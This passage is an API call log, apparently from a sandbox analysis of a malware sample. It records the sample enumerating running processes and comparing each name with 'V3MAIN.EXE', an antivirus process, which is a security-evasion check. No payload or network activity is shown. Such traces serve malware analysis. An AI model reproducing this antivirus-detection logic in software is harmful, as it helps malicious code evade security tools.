lppe=0x18f4b0 | out: lppe=0x18f4b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x2cc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x16, th32ParentProcessID=0x1dc, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0163.310] lstrcpyW (in: lpString1=0x18f6dc, lpString2="svchost.exe" | out: lpString1="svchost.exe") returned="svchost.exe" [0163.310] lstrlenW (lpString="svchost.exe") returned 11 [0163.310] CharUpperBuffW (in: lpsz="svchost.exe", cchLength=0xb | out: lpsz="SVCHOST.EXE") returned 0xb [0163.310] lstrcmpW (lpString1="SVCHOST.EXE", lpString2="V3MAIN.EXE") returned -1 [0163.310] Process32NextW (in: hSnapshot=0xe0, lppe=0x18f4b0 | out: lppe=0x18f4b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x33c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x14, th32ParentProcessID=0x1dc, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0163.311] lstrcpyW (in: lpString1=0x18f6dc, lpString2="svchost.exe" | out: lpString1="svchost.exe") returned="svchost.exe" [0163.311] lstrlenW (lpString="svchost.exe") returned 11 [0163.311] CharUpperBuffW (in: lpsz="svchost.exe", cchLength=0xb | out: lpsz="SVCHOST.EXE") returned 0xb [0163.311] lstrcmpW (lpString1="SVCHOST.EXE", lpString2="V3MAIN.EXE") returned -1 [0163.311] Process32NextW (in: hSnapshot=0xe0, lppe=0x18f4b0 | out: lppe=0x18f4b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x368, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1f, th32ParentProcessID=0x1dc, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0163.312] lstrcpyW (in: lpString1=0x18f6dc, lpString2="svchost.exe" | out: lpString1="svchost.exe") returned="svchost.exe" [0163.312] lstrlenW (lpString="svchost.exe") returned 11 [0163.312] CharUpperBuffW (in: lpsz="svchost.exe", cchLength=0xb | out: lpsz="SVCHOST.EXE") returned 0xb [0163.312] lstrcmpW (lpString1="SVCHOST.EXE", lpString2="V3MAIN.EXE") returned -1 [0163.312] Process32NextW (in: hSnapshot=0xe0, lppe=0x18f4b0 | out: lppe=0x18f4b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x3a4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x7, th32ParentProcessID=0x2cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="audiodg.exe")) returned 1 [0163.312] lstrcpyW (in: lpString1=0x18f6dc, lpString2="audiodg.exe" | out: lpString1="audiodg.exe") returned="audiodg.exe" [0163.313] lstrlenW (lpString="audiodg.exe") returned 11 [0163.313] CharUpperBuffW (in: lpsz="audiodg.exe", cchLength=0xb | out: lpsz="AUDIODG.EXE") returned 0xb [0163.313] lstrcmpW (lpString1="AUDIODG.EXE", lpString2="V3MAIN.EXE") returned -1 [0163.313] Process32NextW (in: hSnapshot=0xe0, lppe=0x18f4b0 | out: lppe=0x18f4b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x3f0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xe, th32ParentProcessID=0x1dc, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0163.313] lstrcpyW (in: lpString1=0x18f6dc, lpString2="svchost.exe" | out: lpString1="svchost.exe") returned="svchost.exe" [0163.313] lstrlenW (lpString="svchost.exe") returned 11 [0163.313] CharUpperBuffW (in: lpsz="svchost.exe", cchLength=0xb | out: lpsz="SVCHOST.EXE") returned 0xb [0163.313] lstrcmpW (lpString1="SVCHOST.EXE", lpString2="V3MAIN.EXE") returned -1 [0163.313] Process32NextW (in: hSnapshot=0xe0, lppe=0x18f4b0 | out: lppe=0x18f4b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x218, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x10, th32ParentProcessID=0x1dc, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0163.314] lstrcpyW (in: lpString1=0x18f6dc, lpString2="svchost.exe" | out: lpString1="svchost.exe") returned="svchost.exe" [0163.314] lstrlenW (lpString="svchost.exe") returned 11 [0163.314] CharUpperBuffW (in: lpsz="svchost.exe", cchLength=0xb | out: lpsz="SVCHOST.EXE") returned 0xb [0163.314] lstrcmpW (lpString1="SVCHOST.EXE", lpString2="V3MAIN.EXE") returned -1 [0163.314] Process32NextW (in: hSnapshot=0xe0, lppe=0x18f4b0 | out: lppe=0x18f4b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x410, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xd, th32ParentProcessID=0x1dc, pcPriClassBase=8, dwFlags=0x0, szExeFile="spoolsv.exe")) returned 1 [0163.315] lstrcpyW (in: lpString1=0x18f6dc, lpString2="spoolsv.exe" | out: lpString1="spoolsv.exe") returned="spoolsv.exe" [0163.315] lstrlenW (lpString="spoolsv.exe") returned 11 [0163.315] CharUpperBuffW (in: lpsz="spoolsv.exe", cchLength=0xb | out: lpsz="SPOOLSV.EXE") returned 0xb [0163.315] lstrcmpW (lpString1="SPOOLSV.EXE", lpString2="V3MAIN.EXE") returned -1 [0163.315] Process32NextW (in: hSnapshot=0xe0, lppe=0x18f4b0 | out: lppe=0x18f4b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x42c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x14, th32ParentProcessID=0x1dc, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0163.315] lstrcpyW (in: lpString1=0x18f6dc, lpString2="svchost.exe" | out: lpString1="svchost.exe") returned="svchost.exe" [0163.315] lstrlenW (lpString="svchost.exe") returned 11 [0163.315] CharUpperBuffW (in: lpsz="svchost.exe", cchLength=0xb | out: lpsz="SVCHOST.EXE") returned 0xb [0163.315] lstrcmpW (lpString1="SVCHOST.EXE", lpString2="V3MAIN.EXE") returned -1 [0163.315] Process32NextW (in: hSnapshot=0xe0, lppe=0x18f4b0 | out: lppe=0x18f4b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x61c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xb, th32ParentProcessID=0x1dc, pcPriClassBase=8, dwFlags=0x0, szExeFile="taskhost.exe")) returned 1 [0163.316] lstrcpyW (in: lpString1=0x18f6dc, lpString2="taskhost.exe" | out: lpString1="taskhost.exe") returned="taskhost.exe" [0163.316] lstrlenW (lpString="taskhost.exe") returned 12 [0163.316] CharUpperBuffW (in: lpsz="taskhost.exe", cchLength=0xc | out: lpsz="TASKHOST.EXE") returned 0xc [0163.316] lstrcmpW (lpString1="TASKHOST.EXE", lpString2="V3MAIN.EXE") returned -1 [0163.316] Process32NextW (in: hSnapshot=0xe0, lppe=0x18f4b0 | out: lppe=0x18f4b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x660, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x5, th32ParentProcessID=0x368, pcPriClassBase=8, dwFlags=0x0, szExeFile="taskeng.exe")) returned 1 [0163.317] lstrcpyW (in: lpString1=0x18f6dc, lpString2="taskeng.exe" | out: lpString1="taskeng.exe") returned="taskeng.exe" [0163.317] lstrlenW (lpString="taskeng.exe") returned 11 [0163.317] CharUpperBuffW (in: lpsz="taskeng.exe", cchLength=0xb | out: lpsz="TASKENG.EXE") returned 0xb [0163.317] lstrcmpW (lpString1="TASKENG.EXE", lpString2="V3MAIN.EXE") returned -1 [0163.317] Process32NextW (in: hSnapshot=0xe0, lppe=0x18f4b0 | out: lppe=0x18f4b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x670, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x6, th32ParentProcessID=0x33c, pcPriClassBase=8, dwFlags=0x0, szExeFile="dwm.exe")) returned 1 [0163.317] lstrcpyW (in: lpString1=0x18f6dc, lpString2="dwm.exe" | out: lpString1="dwm.exe") returned="dwm.exe" [0163.317] lstrlenW (lpString="dwm.exe") returned 7 [0163.318] CharUpperBuffW (in: lpsz="dwm.exe", cchLength=0x7 | out: lpsz="DWM.EXE") returned 0x7 [0163.318] lstrcmpW (lpString1="DWM.EXE", lpString2="V3MAIN.EXE") returned -1 [0163.318] Process32NextW (in: hSnapshot=0xe0, lppe=0x18f4b0 | out: lppe=0x18f4b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x680, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1e, th32ParentProcessID=0x658, pcPriClassBase=8, dwFlags=0x0, szExeFile="explorer.exe")) returned 1 [0163.318] lstrcpyW (in: lpString1=0x18f6dc, lpString2="explorer.exe" | out: lpString1="explorer.exe") returned="explorer.exe" [0163.318] lstrlenW (lpString="explorer.exe") returned 12 [0163.318] CharUpperBuffW (in: lpsz="explorer.exe", cchLength=0xc | out: lpsz="EXPLORER.EXE") returned 0xc [0163.318] lstrcmpW (lpString1="EXPLORER.EXE", lpString2="V3MAIN.EXE") returned -1 [0163.318] Process32NextW (in: hSnapshot=0xe0, lppe=0x18f4b0 | out: lppe=0x18f4b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x6d4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x5, th32ParentProcessID=0x368, pcPriClassBase=8, dwFlags=0x0, szExeFile="taskeng.exe")) returned 1 [0163.319] lstrcpyW (in: lpString1=0x18f6dc, lpString2="taskeng.exe" | out: lpString1="taskeng.exe") returned="taskeng.exe" [0163.319] lstrlenW (lpString="taskeng.exe") returned 11 [0163.319] CharUpperBuffW (in: lpsz="taskeng.exe", cchLength=0xb | out: lpsz="TASKENG.EXE") returned 0xb [0163.319] lstrcmpW (lpString1="TASKENG.EXE", lpString2="V3MAIN.EXE") returned -1 [0163.319] Process32NextW (in: hSnapshot=0xe0, lppe=0x18f4b0 | out: lppe=0x18f4b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x4a8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x14, th32ParentProcessID=0x1dc, pcPriClassBase=6, dwFlags=0x0, szExeFile="MSOSYNC.EXE")) returned 1 [0163.320] lstrcpyW (in: lpString1=0x18f6dc, lpString2="MSOSYNC.EXE" | out: lpString1="MSOSYNC.EXE") returned="MSOSYNC.EXE" [0163.320] lstrlenW (lpString="MSOSYNC.EXE") returned 11 [0163.320] CharUpperBuffW (in: lpsz="MSOSYNC.EXE", cchLength=0xb | out: lpsz="MSOSYNC.EXE") returned 0xb [0163.320] lstrcmpW (lpString1="MSOSYNC.EXE", lpString2="V3MAIN.EXE") returned -1 [0163.320] Process32NextW (in: hSnapshot=0xe0, lppe=0x18f4b0 | out: lppe=0x18f4b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x64c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xa, th32ParentProcessID=0x1dc, pcPriClassBase=6, dwFlags=0x0, szExeFile="taskhost.exe")) returned 1 [0163.320] lstrcpyW (in: lpString1=0x18f6dc, lpString2="taskhost.exe" | out: lpString1="taskhost.exe") returned="taskhost.exe" [0163.320] lstrlenW (lpString="taskhost.exe") returned 12 [0163.320] CharUpperBuffW (in: lpsz="taskhost.exe", cchLength=0xc | out: lpsz="TASKHOST.EXE") returned 0xc [0163.320] lstrcmpW (lpString1="TASKHOST.EXE", lpString2="V3MAIN.EXE") returned -1 [0163.320] Process32NextW (in: hSnapshot=0xe0, lppe=0x18f4b0 | out: lppe=0x18f4b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x2ac, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x680, pcPriClassBase=8, dwFlags=0x0, szExeFile="calls ccd copyright.exe")) returned 1 [0163.321] lstrcpyW (in: lpString1=0x18f6dc, lpString2="calls ccd copyright.exe" | out: lpString1="calls ccd copyright.exe") returned="calls ccd copyright.exe" [0163.321] lstrlenW (lpString="calls ccd copyright.exe") returned 23 [0163.321] CharUpperBuffW (in: lpsz="calls ccd copyright.exe", cchLength=0x17 | out: lpsz="CALLS CCD COPYRIGHT.EXE") returned 0x17 [0163.321] lstrcmpW (lpString1="CALLS CCD COPYRIGHT.EXE", lpString2="V3MAIN.EXE") returned -1 [0163.321] Process32NextW (in: hSnapshot=0xe0, lppe=0x18f4b0 | out: lppe=0x18f4b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x210, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x680, pcPriClassBase=8, dwFlags=0x0, szExeFile="tri.exe")) returned 1 [0163.322] lstrcpyW (in: lpString1=0x18f6dc, lpString2="tri.exe" | out: lpString1="tri.exe") returned="tri.exe" [0163.322] lstrlenW (lpString="tri.exe") returned 7 [0163.322] CharUpperBuffW (in: lpsz="tri.exe", cchLength=0x7 | out: lpsz="TRI.EXE") returned 0x7 [0163.322] lstrcmpW (lpString1="TRI.EXE", lpString2="V3MAIN.EXE") returned -1 [0163.322] Process32NextW (in: hSnapshot=0xe0, lppe=0x18f4b0 | out: lppe=0x18f4b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x73c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x680, pcPriClassBase=8, dwFlags=0x0, szExeFile="navigation-jay.exe")) returned 1 [0163.322] lstrcpyW (in: lpString1=0x18f6dc, lpString2="navigation-jay.exe" | out: lpString1="navigation-jay.exe") returned="navigation-jay.exe" [0163.322] lstrlenW (lpString="navigation-jay.exe") returned 18 [0163.322] CharUpperBuffW (in: lpsz="navigation-jay.exe", cchLength=0x12 | out: lpsz="NAVIGATION-JAY.EXE") returned 0x12 [0163.322] lstrcmpW (lpString1="NAVIGATION-JAY.EXE", lpString2="V3MAIN.EXE") returned -1 [0163.322] Process32NextW (in: hSnapshot=0xe0, lppe=0x18f4b0 | out: lppe=0x18f4b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x594, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x680, pcPriClassBase=8, dwFlags=0x0, szExeFile="chevrolet-play-mel.exe")) returned 1 [0163.323] lstrcpyW (in: lpString1=0x18f6dc, lpString2="chevrolet-play-mel.exe" | out: lpString1="chevrolet-play-mel.exe") returned="chevrolet-play-mel.exe" [0163.323] lstrlenW (lpString="chevrolet-play-mel.exe") returned 22 [0163.323] CharUpperBuffW (in: lpsz="chevrolet-play-mel.exe", cchLength=0x16 | out: lpsz="CHEVROLET-PLAY-MEL.EXE") returned 0x16 [0163.323] lstrcmpW (lpString1="CHEVROLET-PLAY-MEL.EXE", lpString2="V3MAIN.EXE") returned -1 [0163.323] Process32NextW (in: hSnapshot=0xe0, lppe=0x18f4b0 | out: lppe=0x18f4b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x7d0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x680, pcPriClassBase=8, dwFlags=0x0, szExeFile="clause_swaziland_complimentary.exe")) returned 1 [0163.323] lstrcpyW (in: lpString1=0x18f6dc, lpString2="clause_swaziland_complimentary.exe" | out: lpString1="clause_swaziland_complimentary.exe") returned="clause_swaziland_complimentary.exe" [0163.323] lstrlenW (lpString="clause_swaziland_complimentary.exe") returned 34 [0163.323] CharUpperBuffW (in: lpsz="clause_swaziland_complimentary.exe", cchLength=0x22 | out: lpsz="CLAUSE_SWAZILAND_COMPLIMENTARY.EXE") returned 0x22 [0163.323] lstrcmpW (lpString1="CLAUSE_SWAZILAND_COMPLIMENTARY.EXE", lpString2="V3MAIN.EXE") returned -1 [0163.323] Process32NextW (in: hSnapshot=0xe0, lppe=0x18f4b0 | out: lppe=0x18f4b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x440, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x680, pcPriClassBase=8, dwFlags=0x0, szExeFile="ship-loans.exe")) returned 1 [0163.324] lstrcpyW (in: lpString1=0x18f6dc, lpString2="ship-loans.exe" | out: lpString1="ship-loans.exe") returned="ship-loans.exe" [0163.324] lstrlenW (lpString="ship-loans.exe") returned 14 [0163.324] CharUpperBuffW (in: lpsz="ship-loans.exe", cchLength=0xe | out: lpsz="SHIP-LOANS.EXE") returned 0xe [0163.324] lstrcmpW (lpString1="SHIP-LOANS.EXE", lpString2="V3MAIN.EXE") returned -1 [0163.324] Process32NextW (in: hSnapshot=0xe0, lppe=0x18f4b0 | out: lppe=0x18f4b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x35c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x680, pcPriClassBase=8, dwFlags=0x0, szExeFile="isolation.exe")) returned 1 [0163.324] lstrcpyW (in: lpString1=0x18f6dc, lpString2="isolation.exe" | out: lpString1="isolation.exe") returned="isolation.exe" [0163.324] lstrlenW (lpString="isolation.exe") returned 13 [0163.325] CharUpperBuffW (in: lpsz="isolation.exe", cchLength=0xd | out: lpsz="ISOLATION.EXE") returned 0xd [0163.325] lstrcmpW (lpString1="ISOLATION.EXE", lpString2="V3MAIN.EXE") returned -1 [0163.325] Process32NextW (in: hSnapshot=0xe0, lppe=0x18f4b0 | out: lppe=0x18f4b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x230, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x680, pcPriClassBase=8, dwFlags=0x0, szExeFile="abc.exe")) returned 1 [0163.325] lstrcpyW (in: lpString1=0x18f6dc, lpString2="abc.exe" | out: lpString1="abc.exe") returned="abc.exe" [0163.325] lstrlenW (lpString="abc.exe") returned 7 [0163.325] CharUpperBuffW (in: lpsz="abc.exe", cchLength=0x7 | out: lpsz="ABC.EXE") returned 0x7 [0163.325] lstrcmpW (lpString1="ABC.EXE", lpString2="V3MAIN.EXE") returned -1 [0163.325] Process32NextW (in: hSnapshot=0xe0, lppe=0x18f4b0 | out: lppe=0x18f4b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x4c0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x680, pcPriClassBase=8, dwFlags=0x0, szExeFile="previous_automation_previously.exe")) returned 1 [0163.326] lstrcpyW (in: lpString1=0x18f6dc, lpString2="previous_automation_previously.exe" | out: lpString1="previous_automation_previously.exe") returned="previous_automation_previously.exe" [0163.326] lstrlenW (lpString="previous_automation_previously.exe") returned 34 [0163.326] CharUpperBuffW (in: lpsz="previous_automation_previously.exe", cchLength=0x22 | out: lpsz="PREVIOUS_AUTOMATION_PREVIOUSLY.EXE") returned 0x22 [0163.326] lstrcmpW (lpString1="PREVIOUS_AUTOMATION_PREVIOUSLY.EXE", lpString2="V3MAIN.EXE") returned -1 [0163.326] Process32NextW (in: hSnapshot=0xe0, lppe=0x18f4b0 | out: lppe=0x18f4b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x49c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x680, pcPriClassBase=8, dwFlags=0x0, szExeFile="english_performing.exe")) returned 1 [0163.327] lstrcpyW (in: lpString1=0x18f6dc, lpString2="english_performing.exe" | out: lpString1="english_performing.exe") returned="english_performing.exe" [0163.327] lstrlenW (lpString="english_performing.exe") returned 22 [0163.327] CharUpperBuffW (in: lpsz="english_performing.exe", cchLength=0x16 | out: lpsz="ENGLISH_PERFORMING.EXE") returned 0x16 [0163.327] lstrcmpW (lpString1="ENGLISH_PERFORMING.EXE", lpString2="V3MAIN.EXE") returned -1 [0163.327] Process32NextW (in: hSnapshot=0xe0, lppe=0x18f4b0 | out: lppe=0x18f4b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x148, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x680, pcPriClassBase=8, dwFlags=0x0, szExeFile="laptop-tattoo.exe")) returned 1 [0163.327] lstrcpyW (in: lpString1=0x18f6dc, lpString2="laptop-tattoo.exe" | out: lpString1="laptop-tattoo.exe") returned="laptop-tattoo.exe" [0163.327] lstrlenW (lpString="laptop-tattoo.exe") returned 17 [0163.327] CharUpperBuffW (in: lpsz="laptop-tattoo.exe", cchLength=0x11 | out: lpsz="LAPTOP-TATTOO.EXE") returned 0x11 [0163.327] lstrcmpW (lpString1="LAPTOP-TATTOO.EXE", lpString2="V3MAIN.EXE") returned -1 [0163.327] Process32NextW (in: hSnapshot=0xe0, lppe=0x18f4b0 | out: lppe=0x18f4b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x234, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x680, pcPriClassBase=8, dwFlags=0x0, szExeFile="c-weird-baskets.exe")) returned 1 [0163.345] lstrcpyW (in: lpString1=0x18f6dc, lpString2="c-weird-baskets.exe" | out: lpString1="c-weird-baskets.exe") returned="c-weird-baskets.exe" [0163.345] lstrlenW (lpString="c-weird-baskets.exe") returned 19 [0163.345] CharUpperBuffW (in: lpsz="c-weird-baskets.exe", cchLength=0x13 | out: lpsz="C-WEIRD-BASKETS.EXE") returned 0x13 [0163.345] lstrcmpW (lpString1="C-WEIRD-BASKETS.EXE", lpString2="V3MAIN.EXE") returned -1 [0163.345] Process32NextW (in: hSnapshot=0xe0, lppe=0x18f4b0 | out: lppe=0x18f4b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x4fc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x680, pcPriClassBase=8, dwFlags=0x0, szExeFile="volume.exe")) returned 1 [0163.346] lstrcpyW (in: lpString1=0x18f6dc, lpString2="volume.exe" | out: lpString1="volume.exe") returned="volume.exe" [0163.346] lstrlenW (lpString="volume.exe") returned 10 [0163.346] CharUpperBuffW (in: lpsz="volume.exe", cchLength=0xa | out: lpsz="VOLUME.EXE") returned 0xa [0163.346] lstrcmpW (lpString1="VOLUME.EXE", lpString2="V3MAIN.EXE") returned 1 [0163.346] Process32NextW (in: hSnapshot=0xe0, lppe=0x18f4b0 | out: lppe=0x18f4b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x570, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x680, pcPriClassBase=8, dwFlags=0x0, szExeFile="rich-zealand.exe")) returned 1 [0163.346] lstrcpyW (in: lpString1=0x18f6dc, lpString2="rich-zealand.exe" | out: lpString1="rich-zealand.exe") returned="rich-zealand.exe" [0163.347] lstrlenW (lpString="rich-zealand.exe") returned 16 [0163.347] CharUpperBuffW (in: lpsz="rich-zealand.exe", cchLength=0x10 | out: lpsz="RICH-ZEALAND.EXE") returned 0x10 [0163.347] lstrcmpW (lpString1="RICH-ZEALAND.EXE", lpString2="V3MAIN.EXE") returned -1 [0163.347] Process32NextW (in: hSnapshot=0xe0, lppe=0x18f4b0 | out: lppe=0x18f4b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x2c8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x680, pcPriClassBase=8, dwFlags=0x0, szExeFile="objectives-bailey-audit.exe")) returned 1 [0163.347] lstrcpyW (in: lpString1=0x18f6dc, lpString2="objectives-bailey-audit.exe" | out: lpString1="objectives-bailey-audit.exe") returned="objectives-bailey-audit.exe" [0163.347] lstrlenW (lpString="objectives-bailey-audit.exe") returned 27 [0163.347] CharUpperBuffW (in: lpsz="objectives-bailey-audit.exe", cchLength=0x1b | out: lpsz="OBJECTIVES-BAILEY-AUDIT.EXE") returned 0x1b [0163.347] lstrcmpW (lpString1="OBJECTIVES-BAILEY-AUDIT.EXE", lpString2="V3MAIN.EXE") returned -1 [0163.347] Process32NextW (in: hSnapshot=0xe0, lppe=0x18f4b0 | out: lppe=0x18f4b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x6d0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x680, pcPriClassBase=8, dwFlags=0x0, szExeFile="puzzle-fcc-tuesday.exe")) returned 1 [0163.348] lstrcpyW (in: lpString1=0x18f6dc, lpString2="puzzle-fcc-tuesday.exe" | out: lpString1="puzzle-fcc-tuesday.exe") returned="puzzle-fcc-tuesday.exe" [0163.348] lstrlenW (lpString="puzzle-fcc-tuesday.exe") returned 22 [0163.348] CharUpperBuffW (in: lpsz="puzzle-fcc-tuesday.exe", cchLength=0x16 | out: lpsz="PUZZLE-FCC-TUESDAY.EXE") returned 0x16 [0163.348] lstrcmpW (lpString1="PUZZLE-FCC-TUESDAY.EXE", lpString2="V3MAIN.EXE") returned -1 [0163.348] Process32NextW (in: hSnapshot=0xe0, lppe=0x18f4b0 | out: lppe=0x18f4b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x690, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x680, pcPriClassBase=8, dwFlags=0x0, szExeFile="sayconvenience.exe")) returned 1 [0163.351] lstrcpyW (in: lpString1=0x18f6dc, lpString2="sayconvenience.exe" | out: lpString1="sayconvenience.exe") returned="sayconvenience.exe" [0163.351] lstrlenW (lpString="sayconvenience.exe") returned 18 [0163.351] CharUpperBuffW (in: lpsz="sayconvenience.exe", cchLength=0x12 | out: lpsz="SAYCONVENIENCE.EXE") returned 0x12 [0163.351] lstrcmpW (lpString1="SAYCONVENIENCE.EXE", lpString2="V3MAIN.EXE") returned -1 [0163.351] Process32NextW (in: hSnapshot=0xe0, lppe=0x18f4b0 | out: lppe=0x18f4b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x184, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x680, pcPriClassBase=8, dwFlags=0x0, szExeFile="psychology-leaving-examinations.exe")) returned 1 [0163.352] lstrcpyW (in: lpString1=0x18f6dc, lpString2="psychology-leaving-examinations.exe" | out: lpString1="psychology-leaving-examinations.exe") returned="psychology-leaving-examinations.exe" [0163.352] lstrlenW (lpString="psychology-leaving-examinations.exe") returned 35 [0163.352] CharUpperBuffW (in: lpsz="psychology-leaving-examinations.exe", cchLength=0x23 | out: lpsz="PSYCHOLOGY-LEAVING-EXAMINATIONS.EXE") returned 0x23 [0163.352] lstrcmpW (lpString1="PSYCHOLOGY-LEAVING-EXAMINATIONS.EXE", lpString2="V3MAIN.EXE") returned -1 [0163.352] Process32NextW (in: hSnapshot=0xe0, lppe=0x18f4b0 | out: lppe=0x18f4b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x9ac, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1f, th32ParentProcessID=0x680, pcPriClassBase=8, dwFlags=0x0, szExeFile="EXCEL.EXE")) returned 1 [0163.352] lstrcpyW (in: lpString1=0x18f6dc, lpString2="EXCEL.EXE" | out: lpString1="EXCEL.EXE") returned="EXCEL.EXE" [0163.352] lstrlenW (lpString="EXCEL.EXE") returned 9 [0163.352] CharUpperBuffW (in: lpsz="EXCEL.EXE", cchLength=0x9 | out: lpsz="EXCEL.EXE") returned 0x9 [0163.352] lstrcmpW (lpString1="EXCEL.EXE", lpString2="V3MAIN.EXE") returned -1 [0163.352] Process32NextW (in: hSnapshot=0xe0, lppe=0x18f4b0 | out: lppe=0x18f4b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x9d4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x6, th32ParentProcessID=0x1dc, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0163.353] lstrcpyW (in: lpString1=0x18f6dc, lpString2="svchost.exe" | out: lpString1="svchost.exe") returned="svchost.exe" [0163.353] lstrlenW (lpString="svchost.exe") returned 11 [0163.353] CharUpperBuffW (in: lpsz="svchost.exe", cchLength=0xb | out: lpsz="SVCHOST.EXE") returned 0xb [0163.353] lstrcmpW (lpString1="SVCHOST.EXE", lpString2="V3MAIN.EXE") returned -1 [0163.353] Process32NextW (in: hSnapshot=0xe0, lppe=0x18f4b0 | out: lppe=0x18f4b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x9f8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x6, th32ParentProcessID=0x1dc, pcPriClassBase=8, dwFlags=0x0, szExeFile="sppsvc.exe")) returned 1 [0163.353] lstrcpyW (in: lpString1=0x18f6dc, lpString2="sppsvc.exe" | out: lpString1="sppsvc.exe") returned="sppsvc.exe" [0163.353] lstrlenW (lpString="sppsvc.exe") returned 10 [0163.353] CharUpperBuffW (in: lpsz="sppsvc.exe", cchLength=0xa | out: lpsz="SPPSVC.EXE") returned 0xa [0163.353] lstrcmpW (lpString1="SPPSVC.EXE", lpString2="V3MAIN.EXE") returned -1 [0163.353] Process32NextW (in: hSnapshot=0xe0, lppe=0x18f4b0 | out: lppe=0x18f4b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xa20, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x5, th32ParentProcessID=0x1dc, pcPriClassBase=8, dwFlags=0x0, szExeFile="OSPPSVC.EXE")) returned 1 [0163.354] lstrcpyW (in: lpString1=0x18f6dc, 